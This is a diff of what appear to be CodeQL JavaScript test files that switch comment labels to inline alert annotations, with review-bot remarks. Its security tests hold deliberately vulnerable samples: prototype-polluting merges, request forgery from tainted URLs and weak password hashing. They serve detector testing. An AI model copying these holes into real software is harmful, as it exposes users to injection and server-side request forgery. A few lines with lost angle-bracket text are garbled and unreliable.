@@ -68,5 +68,5 @@ function spltOnRegexp(target, path, value) { let key = keys[i]; target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js index 14a0a19fb626..ad420927a5c4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js @@ -5,7 +5,7 @@ function copyUsingForIn(dst, src) { if (dst[key]) { copyUsingForIn(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -15,7 +15,7 @@ function copyUsingKeys(dst, src) { if (dst[key]) { copyUsingKeys(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } }); } @@ -33,7 +33,7 @@ function copyRestAux(dst, value, key) { if (dstValue) { copyRest(dstValue, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } @@ -43,7 +43,7 @@ function copyProtoGuarded(dst, src) { if (dst[key]) { copyProtoGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -54,7 +54,7 @@ function copyCtorGuarded(dst, src) { if (dst[key]) { copyCtorGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -65,7 +65,7 @@ function copyDoubleGuarded(dst, src) { if (dst[key]) { copyDoubleGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -80,7 +80,7 @@ function copyComplex(dst, src) { if (dst[key]) { copyComplex(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } 
@@ -93,7 +93,7 @@ function copyHasOwnProperty(dst, src) { if (dst.hasOwnProperty(key)) { copyHasOwnProperty(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -106,7 +106,7 @@ function copyHasOwnPropertyBad(dst, src) { if (dst[key]) { copyHasOwnPropertyBad(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -118,21 +118,21 @@ function copyHasOwnPropertyTearOff(dst, src) { if (_hasOwnProp.call(dst, key)) { copyHasOwnPropertyTearOff(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } function shallowExtend(dst, src) { for (let key in src) { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } function transform(src, fn) { if (typeof src !== 'object') return fn(src); for (let key in src) { - src[key] = transform(src[key], fn); // OK + src[key] = transform(src[key], fn); } return src; } @@ -141,7 +141,7 @@ function clone(src) { if (typeof src !== 'object') return src; let result = {}; for (let key in src) { - result[key] = clone(src[key]); // OK + result[key] = clone(src[key]); } return result; } @@ -151,7 +151,7 @@ function higherOrderRecursion(dst, src, callback) { if (dst[key]) { callback(dst, src, key); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -168,7 +168,7 @@ function instanceofObjectGuard(dst, src) { if (typeof dstValue === 'object' && dstValue instanceof Object) { instanceofObjectGuard(dstValue, src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -181,7 +181,7 @@ function copyWithBlacklist(dst, src) { if (dst[key]) { copyWithBlacklist(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -193,7 +193,7 @@ function copyUsingPlainForLoop(dst, src) { if (dst[key]) { copyUsingPlainForLoop(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } 
@@ -205,7 +205,7 @@ function copyUsingPlainForLoopNoAlias(dst, src) { if (dst[key]) { copyUsingPlainForLoopNoAlias(dst[keys[i]], src[keys[i]]); } else { - dst[keys[i]] = src[keys[i]]; // NOT OK - but not flagged + dst[keys[i]] = src[keys[i]]; // $ MISSING: Alert } } } @@ -214,7 +214,7 @@ function deepSet(map, key1, key2, value) { if (!map[key1]) { map[key1] = Object.create(null); } - map[key1][key2] = value; // OK + map[key1][key2] = value; } function deepSetCaller(data) { @@ -230,7 +230,7 @@ function deepSetBad(map, key1, key2, value) { if (!map[key1]) { map[key1] = Object.create(null); } - map[key1][key2] = value; // NOT OK - object literal can flow here + map[key1][key2] = value; // $ Alert - object literal can flow here } function deepSetCallerBad(data) { @@ -254,7 +254,7 @@ function mergeWithCopy(dst, src) { let result = maybeCopy(dst); for (let key in src) { if (src.hasOwnProperty(key)) { - result[key] = mergeWithCopy(dst[key], src[key]); // OK + result[key] = mergeWithCopy(dst[key], src[key]); } } return result; @@ -267,7 +267,7 @@ function copyUsingEntries(dst, src) { if (dst[key]) { copyUsingEntries(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -277,7 +277,7 @@ function copyUsingReflect(dst, src) { if (dst[key]) { copyUsingReflect(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } }); } @@ -290,7 +290,7 @@ function copyWithPath(dst, src, path) { } else { let target = {}; target[path] = {}; - target[path][key] = src[key]; // OK + target[path][key] = src[key]; doSomething(target); } } @@ -305,7 +305,7 @@ function typeofObjectTest(dst, src) { if (dst[key] && typeof value === 'object') { typeofObjectTest(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } 
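Review bot: The `$ MISSING: Alert` on `dst[keys[i]] = src[keys[i]]` (PrototypePollutingFunction/tests.js, hunk `@@ -205,7 +205,7 @@`) records a known false negative without a reason, whereas the `$ SPURIOUS: Alert - due to imprecise barrier for captured variable` line later in this file keeps one. Judging by the function name `copyUsingPlainForLoopNoAlias`, the miss comes from the write going through `keys[i]` rather than the `key` local, so something like `// $ MISSING: Alert - property name read as keys[i], not via the key alias` would document it; this should be confirmed against the query. The same gap applies to the `$ MISSING: Alert` in `mergeUsingCallback` (hunk `@@ -390,7 +390,7 @@`) and to `_.merge({}, req.query)` in src-vulnerable-lodash/tst.js, where a reader should learn that a clean result on these shapes is not evidence of safety. The enclosing function starts before the hunk.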
@@ -319,7 +319,7 @@ function mergeRephinementNode(dst, src) { if (dst[key] && typeof value === 'object') { mergeRephinementNode(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -335,7 +335,7 @@ function mergeSelective(dst, src) { if (dst[key]) { mergeSelective(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -354,7 +354,7 @@ function mergePlainObjectsOnly(target, source) { if (isNonArrayObject(source[key]) && key in target) { target[key] = mergePlainObjectsOnly(target[key], source[key], options); } else { - target[key] = source[key]; // OK - but flagged anyway due to imprecise barrier for captured variable + target[key] = source[key]; // $ SPURIOUS: Alert - due to imprecise barrier for captured variable } }); } @@ -370,7 +370,7 @@ function mergePlainObjectsOnlyNoClosure(target, source) { if (isNonArrayObject(source[key]) && key in target) { target[key] = mergePlainObjectsOnlyNoClosure(target[key], source[key], options); } else { - target[key] = source[key]; // OK + target[key] = source[key]; } } } @@ -390,7 +390,7 @@ function mergeUsingCallback(dst, src) { if (dst[key]) { mergeUsingCallback(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK - but not currently flagged + dst[key] = src[key]; // $ MISSING: Alert } }); } @@ -400,7 +400,7 @@ function mergeUsingCallback2(dst, src) { if (dst[key]) { mergeUsingCallback2(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -416,7 +416,7 @@ function copyUsingWrappedRead(dst, src) { if (target) { copyUsingWrappedRead(target, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -433,7 +433,7 @@ function copyUsingAlmostSafeRead(dst, src) { if (target) { copyUsingAlmostSafeRead(target, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } 
@@ -450,7 +450,7 @@ function copyUsingSafeRead(dst, src) { if (target) { copyUsingSafeRead(target, value); } else { - dst[key] = value; // OK + dst[key] = value; } } } @@ -462,9 +462,9 @@ function copyUsingForOwn(dst, src) { copyUsingForOwn(dst[key], src[key]); } else { // Handle a few different ways to access src[key] - if (something()) dst[key] = src[key]; // NOT OK - if (something()) dst[key] = o[key]; // NOT OK - if (something()) dst[key] = value; // NOT OK + if (something()) dst[key] = src[key]; // $ Alert + if (something()) dst[key] = o[key]; // $ Alert + if (something()) dst[key] = value; // $ Alert } }); } @@ -474,7 +474,7 @@ function copyUsingUnderscoreOrLodash(dst, src) { if (dst[key]) { copyUsingUnderscoreOrLodash(dst[key], src[key]); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -486,7 +486,7 @@ function copyPlainObject(dst, src) { if (dst[key] && isPlainObject(src)) { copyPlainObject(dst[key], src[key]); } else { - dst[key] = src[key]; // OK - but flagged anyway + dst[key] = src[key]; // $ SPURIOUS: Alert } } } @@ -499,7 +499,7 @@ function copyPlainObject2(dst, src) { if (isPlainObject(target) && isPlainObject(value)) { copyPlainObject2(target, value); } else { - dst[key] = value; // OK + dst[key] = value; } } } @@ -514,7 +514,7 @@ function usingDefineProperty(dst, src) { } else { var descriptor = {}; descriptor.value = src[key]; - Object.defineProperty(dst, key, descriptor); // NOT OK + Object.defineProperty(dst, key, descriptor); // $ Alert } } } @@ -526,7 +526,7 @@ function copyUsingForInAndRest(...args) { if (dst[key]) { copyUsingForInAndRest(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -544,7 +544,7 @@ function mergeUsingCallback3(dst, src) { if (dst[key]) { mergeUsingCallback3(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } 
@@ -556,7 +556,7 @@ function copyHasOwnProperty2(dst, src) { if (Object.hasOwn(dst, key)) { copyHasOwnProperty2(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -568,7 +568,7 @@ function copyHasOwnProperty3(dst, src) { if (_.has(dst, key)) { copyHasOwnProperty3(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -602,7 +602,7 @@ function merge_captureBarrier(dest, source) { if (dest[key]) { merge_captureBarrier(dest[key], source[key]); } else { - dest[key] = captureBarrier(source[key]); // OK - but currently flagged anyway + dest[key] = captureBarrier(source[key]); // $ SPURIOUS: Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js index 041d9adf02fc..a8fdfde4f382 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js @@ -1,3 +1,3 @@ addEventListener("message", (event) => { - angular.merge({}, JSON.parse(event.data)); // NOT OK + angular.merge({}, JSON.parse(event.data)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js index ba7d026b9cd9..8e50da57e315 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js @@ -4,5 +4,5 @@ let _ = require('lodash'); let app = express(); app.get('/hello', function(req, res) { - _.merge({}, req.query.foo); // OK + _.merge({}, req.query.foo); }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js index b1da6d9ab05d..8111eb36d94a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js @@ -4,17 +4,17 @@ let _ = require('lodash'); let app = express(); app.get('/hello', function(req, res) { - _.merge({}, req.query.foo); // NOT OK - _.merge({}, req.query); // NOT OK - but not flagged + _.merge({}, req.query.foo); // $ Alert + _.merge({}, req.query); // $ MISSING: Alert _.merge({}, { - value: req.query.value // NOT OK + value: req.query.value // $ Alert }); let opts = { thing: req.query.value // wrapped and unwrapped value }; _.merge({}, { - value: opts.thing // NOT OK + value: opts.thing // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html index 02d6d086d547..47c340cb8784 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html @@ -1,7 +1,7 @@ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js index acbfa2acbb42..5b1b7a277081 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js 
@@ -1,6 +1,6 @@ import * as webix from "webix"; addEventListener("message", (event) => { - webix.extend({}, JSON.parse(event.data)); // NOT OK - webix.copy({}, JSON.parse(event.data)); // NOT OK + webix.extend({}, JSON.parse(event.data)); // $ Alert + webix.copy({}, JSON.parse(event.data)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-916/tst.js b/javascript/ql/test/query-tests/Security/CWE-916/tst.js index c5f1c31127a8..d41c6b719a18 100644 --- a/javascript/ql/test/query-tests/Security/CWE-916/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-916/tst.js @@ -1,9 +1,9 @@ var password = "secret"; -require("bcrypt").hash(password); // OK +require("bcrypt").hash(password); -require('crypto').createCipher('aes192').write(password); // NOT OK +require('crypto').createCipher('aes192').write(password); // $ Alert -require('crypto').createHash('sha256').write(password); // NOT OK +require('crypto').createHash('sha256').write(password); // $ Alert -require('crypto').createHash('md5').write(password); // NOT OK +require('crypto').createHash('md5').write(password); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js index c55270377ede..a8d7d429cf86 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js 
@@ -9,17 +9,17 @@ export function MyComponent() { request(params.foo); // Possibly problematic, but not currently flagged. const query = window.location.search.substring(1); - request('https://example.com/api/' + query + '/id'); // NOT OK - request('https://example.com/api?q=' + query); // OK + request('https://example.com/api/' + query + '/id'); // $ Alert[js/client-side-request-forgery] + request('https://example.com/api?q=' + query); request('https://example.com/api/' + window.location.search); // likely OK - but currently flagged anyway const fragment = window.location.hash.substring(1); - request('https://example.com/api/' + fragment + '/id'); // NOT OK - request('https://example.com/api?q=' + fragment); // OK + request('https://example.com/api/' + fragment + '/id'); // $ Alert[js/client-side-request-forgery] + request('https://example.com/api?q=' + fragment); const name = window.name; - request('https://example.com/api/' + name + '/id'); // NOT OK - request('https://example.com/api?q=' + name); // OK + request('https://example.com/api/' + name + '/id'); // $ Alert[js/client-side-request-forgery] + request('https://example.com/api?q=' + name); - request(window.location.href + '?q=123'); // OK + request(window.location.href + '?q=123'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js index 7b4c792bb366..50a7fe976998 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js 
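Review bot: In `clientSide.js` the context line `request('https://example.com/api/' + window.location.search); // likely OK - but currently flagged anyway` keeps its free-text comment, while every other flagged line in this hunk now carries a tagged annotation. If this directory is checked with inline expectations, a flagged line with no annotation would presumably be reported as an unexpected result. Following the convention the commit uses elsewhere for known false positives, it would read `// $ SPURIOUS: Alert[js/client-side-request-forgery] - likely OK`. The neighbouring `request(params.foo); // Possibly problematic, but not currently flagged.` is a candidate for `// $ MISSING: Alert[js/client-side-request-forgery]` on the same reasoning, if the team considers it a true positive. `MyComponent` starts above the hunk.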
@@ -13,40 +13,40 @@ let Uri = goog.require('goog.Uri'); var server = http.createServer(function(req, res) { var tainted = url.parse(req.url, true).query.url; - request("example.com"); // OK + request("example.com"); - request(tainted); // NOT OK + request(tainted); // $ Alert[js/request-forgery] - request.get(tainted); // NOT OK + request.get(tainted); // $ Alert[js/request-forgery] var options = {}; - options.url = tainted; // NOT OK + options.url = tainted; // $ Alert request(options); - request("http://" + tainted); // NOT OK + request("http://" + tainted); // $ Alert[js/request-forgery] - request("http://example.com" + tainted); // NOT OK + request("http://example.com" + tainted); // $ Alert[js/request-forgery] - request("http://example.com/" + tainted); // NOT OK + request("http://example.com/" + tainted); // $ Alert[js/request-forgery] - request("http://example.com/?" + tainted); // OK + request("http://example.com/?" + tainted); - http.get(relativeUrl, {host: tainted}); // NOT OK + http.get(relativeUrl, {host: tainted}); // $ Alert[js/request-forgery] - XhrIo.send(new Uri(tainted)); // NOT OK - new XhrIo().send(new Uri(tainted)); // NOT OK + XhrIo.send(new Uri(tainted)); // $ Alert[js/request-forgery] + new XhrIo().send(new Uri(tainted)); // $ Alert[js/request-forgery] let base = require('./config').base; - request(`http://example.com/${base}/${tainted}`); // NOT OK + request(`http://example.com/${base}/${tainted}`); // $ Alert[js/request-forgery] - request(`http://example.com/${base}/v1/${tainted}`); // NOT OK + request(`http://example.com/${base}/v1/${tainted}`); // $ Alert[js/request-forgery] - request('http://example.com/' + base + '/' + tainted); // NOT OK + request('http://example.com/' + base + '/' + tainted); // $ Alert[js/request-forgery] - request('http://example.com/' + base + ('/' + tainted)); // NOT OK - but not flagged [INCONSISTENCY] + request('http://example.com/' + base + ('/' + tainted)); // $ MISSING: Alert - 
request(`http://example.com/?${base}/${tainted}`); // OK + request(`http://example.com/?${base}/${tainted}`); request(`http://example.com/${base}${tainted}`); // OK - assumed safe @@ -58,14 +58,14 @@ var server = http.createServer(async function(req, res) { var tainted = url.parse(req.url, true).query.url; var client = await CDP(options); - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] CDP(options).catch((ignored) => {}).then((client) => { - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] }) CDP(options, (client) => { - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] }); }) @@ -73,7 +73,7 @@ import {JSDOM} from "jsdom"; var server = http.createServer(async function(req, res) { var tainted = url.parse(req.url, true).query.url; - JSDOM.fromURL(tainted); // NOT OK + JSDOM.fromURL(tainted); // $ Alert[js/request-forgery] }); var route = require('koa-route'); @@ -81,15 +81,15 @@ var Koa = require('koa'); var app = new Koa(); app.use(route.get('/pets', (context, param1, param2, param3) => { - JSDOM.fromURL(param1); // NOT OK + JSDOM.fromURL(param1); // $ Alert[js/request-forgery] })); const router = require('koa-router')(); const app = new Koa(); router.get('/', async (ctx, next) => { - JSDOM.fromURL(ctx.params.foo); // NOT OK + JSDOM.fromURL(ctx.params.foo); // $ Alert[js/request-forgery] }).post('/', async (ctx, next) => { - JSDOM.fromURL(ctx.params.foo); // NOT OK + JSDOM.fromURL(ctx.params.foo); // $ Alert[js/request-forgery] }); app.use(router.routes()); @@ -97,7 +97,7 @@ import {JSDOM} from "jsdom"; var server = http.createServer(async function(req, res) { var tainted = url.parse(req.url, true).query.url; - new WebSocket(tainted); // NOT OK + new WebSocket(tainted); // $ Alert[js/request-forgery] }); 
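Review bot: In the first `serverSide.js` hunk, `options.url = tainted; // $ Alert` is the only annotation without a query id. Every other expected result in the file is written `// $ Alert[js/request-forgery]`, and the sibling `clientSide.js` uses a second id, so two queries appear to share this directory. The same bare form appears at `url: tainted // $ Alert` in the later `@@ -124,12` hunk. I would write both as `// $ Alert[js/request-forgery]` so that the SSRF expectation is pinned to the server-side query and cannot be satisfied or broken by the client-side one. It is also worth confirming that the result really is reported on the assignment and not on the following `request(options)` call, which the hunk leaves unannotated.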
@@ -124,12 +124,12 @@ var server2 = http.createServer(function(req, res) { axios({ method: 'get', - url: tainted // NOT OK + url: tainted // $ Alert }) var myUrl = `${something}/bla/${tainted}`; - axios.get(myUrl); // NOT OK + axios.get(myUrl); // $ Alert[js/request-forgery] var myEncodedUrl = `${something}/bla/${encodeURIComponent(tainted)}`; - axios.get(myEncodedUrl); // OK + axios.get(myEncodedUrl); }) \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js b/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js index 1b66865ea21c..683ca49fcafb 100644 --- a/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js +++ b/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js @@ -1,5 +1,4 @@ -// NOT OK -while(c){ +while(c){ // $ Alert switch(c){ case "/": break; @@ -8,8 +7,7 @@ while(c){ break; } -// NOT OK -function f() { +function f() { // $ Alert for (; k < numprecincts;) { var packet = createPacket(resolution, k, l); k++; @@ -17,14 +15,14 @@ function f() { } } -// OK + var oHasProps = false; for (var p in o) { oHasProps = true; break; } -// OK + while(c){ if (c === '"') break; diff --git a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js index 47efe8c1cb6c..adbd85cf6157 100644 --- a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js +++ b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js @@ -1,8 +1,8 @@ var arr = [1,2,3]; -arr.concat([1,2,3]); // NOT OK! +arr.concat([1,2,3]); // $ Alert -arr.concat(arr); // NOT OK! +arr.concat(arr); // $ Alert console.log(arr.concat([1,2,3])); diff --git a/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js b/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js index 114db4ed8d3e..35338b7bed10 100644 --- a/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js 
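Review bot: In `EphemeralLoop/tst.js` the second hunk folds the old block label `// NOT OK` into `function f() { // $ Alert`, but the loop this test targets is on the next line, `for (; k < numprecincts;) {`. Inline annotations are matched by line, so if the query reports the loop statement (as `while(c){ // $ Alert` in the first hunk suggests) the expectation should sit on the loop: `for (; k < numprecincts;) { // $ Alert`. The original comment labelled the whole function and gave no location, so it cannot simply be moved onto the `function` line. The body of `f` continues outside the hunk.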
+++ b/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js @@ -1,17 +1,16 @@ -// NOT OK -function f() { +function f() { // $ Alert if (foo()) return true; } -// OK + function g() { if (foo()) return true; return false; } -// OK + function h() { open(); try { @@ -21,7 +20,7 @@ function h() { } } -// OK + function k(x) { switch (x) { case 1: @@ -31,20 +30,20 @@ function k(x) { } } -// OK + function l() { return 23; alert("Hi"); } -// OK + function m() { if (foo()) return true; throw new Error("not foo!"); } -// OK + function n() { if (foo()) return true; @@ -60,7 +59,7 @@ function foo() { } // -// OK: dual-use constructor +// OK - dual-use constructor function Point(x, y) { if (!(this instanceof Point)) return new Point(x, y); @@ -68,7 +67,7 @@ function Point(x, y) { this.y = y; } -// OK: infinite loops +// OK - infinite loops function q(n) { for (var i=0;;++i) if (i>2*n) @@ -96,14 +95,12 @@ function t(n) { } while("true"); } -// NOT OK -var u = function() { +var u = function() { // $ Alert if (foo()) return true; }; -// NOT OK -function v(b) { +function v(b) { // $ Alert if (b) return 1; } diff --git a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js index f2331a705bdf..990179e6200a 100644 --- a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js +++ b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js @@ -1,19 +1,16 @@ -// OK + for (j = i - 1; j >= 0; --j) { } -// NOT OK -for (j = i + 1; j < strLength; --j) { +for (j = i + 1; j < strLength; --j) { // $ Alert } -// NOT OK -for (var i = 0, l = c.length; i > l; i ++) { +for (var i = 0, l = c.length; i > l; i ++) { // $ Alert } -// OK + for (i=lower-1; i>=0; --i) a[i] = 0; -// NOT OK -for (i=upper+1; i5; --i) + for (var j=i; i>5; --i) // $ Alert f(i, j); - // OK + for (var k=0; k Foo
    Click me
    -
    Click me
    +
    Click me
    \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js index 7b9968115f5e..7f4296932d96 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js @@ -17,17 +17,17 @@ console.log(returnsValue()) console.log(stub()) - console.log(onlySideEffects()); // Not OK! + console.log(onlySideEffects()); // $ Alert - var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK! A is never used. + var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK - A is never used. var b = onlySideEffects(); console.log(b); - var c = 42 + (onlySideEffects(), 42); // OK, value is thrown away. + var c = 42 + (onlySideEffects(), 42); // OK - value is thrown away. console.log(c); - var d = 42 + (42, onlySideEffects()); // NOT OK! + var d = 42 + (42, onlySideEffects()); // $ Alert console.log(d); if (onlySideEffects()) { @@ -42,7 +42,7 @@ onlySideEffects: onlySideEffects } - var e = myObj.onlySideEffects.apply(this, arguments); // NOT OK! + var e = myObj.onlySideEffects.apply(this, arguments); // $ Alert console.log(e); function onlySideEffects2() { @@ -50,11 +50,11 @@ } var bothOnlyHaveSideEffects = Math.random() > 0.5 ? onlySideEffects : onlySideEffects2; - var f = bothOnlyHaveSideEffects(); // NOT OK! + var f = bothOnlyHaveSideEffects(); // $ Alert console.log(f); var oneOfEach = Math.random() > 0.5 ? onlySideEffects : returnsValue; - var g = oneOfEach(); // OK + var g = oneOfEach(); console.log(g); function alwaysThrows() { 
@@ -66,28 +66,28 @@ throw new Error("Important error!") } - var h = returnsValue() || alwaysThrows(); // OK! + var h = returnsValue() || alwaysThrows(); console.log(h); function equals(x, y) { return x === y; } - var foo = [1,2,3].filter(n => {equals(n, 3)}) // NOT OK! + var foo = [1,2,3].filter(n => {equals(n, 3)}) // $ Alert console.log(foo); import { filter } from 'lodash' - var bar = filter([1,2,4], x => { equals(x, 3) } ) // NOT OK! + var bar = filter([1,2,4], x => { equals(x, 3) } ) // $ Alert console.log(bar); - var baz = [1,2,3].filter(n => {n === 3}) // OK + var baz = [1,2,3].filter(n => {n === 3}) console.log(baz); class Deferred { } - new Deferred().resolve(onlySideEffects()); // OK + new Deferred().resolve(onlySideEffects()); Promise.all([onlySideEffects(), onlySideEffects()]) })(); @@ -104,16 +104,16 @@ class Foo { class Bar extends Foo { constructor() { - console.log(super()); // OK. + console.log(super()); } } () => { let equals = (x, y) => { return x === y; }; - var foo = [1,2,3].findLastIndex(n => { equals(n, 3); }) // NOT OK + var foo = [1,2,3].findLastIndex(n => { equals(n, 3); }) // $ Alert console.log(foo); - var foo = [1,2,3].findLast(n => { equals(n, 3); }) // NOT OK + var foo = [1,2,3].findLast(n => { equals(n, 3); }) // $ Alert console.log(foo); } diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts index 6da3bde4bf01..758b4480c64e 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts @@ -3,4 +3,4 @@ declare function returnsSomething(): number; console.log(returnsSomething()); -console.log(returnsVoid()); // NOT OK! \ No newline at end of file +console.log(returnsVoid()); // $ Alert \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js index aa5ee0e1fb5b..dd0468451930 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js @@ -1,4 +1,4 @@ function f() { - if (1 > 2) {} else {} // NOT OK - always false - if (1 > 0) {} else {} // NOT OK - always true + if (1 > 2) {} else {} // $ Alert - always false + if (1 > 0) {} else {} // $ Alert - always true } diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js index a40fc483a06c..f16d5a000a22 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js @@ -1,11 +1,11 @@ function defaultParam(param = 0) { - if (param > 0) {} // OK + if (param > 0) 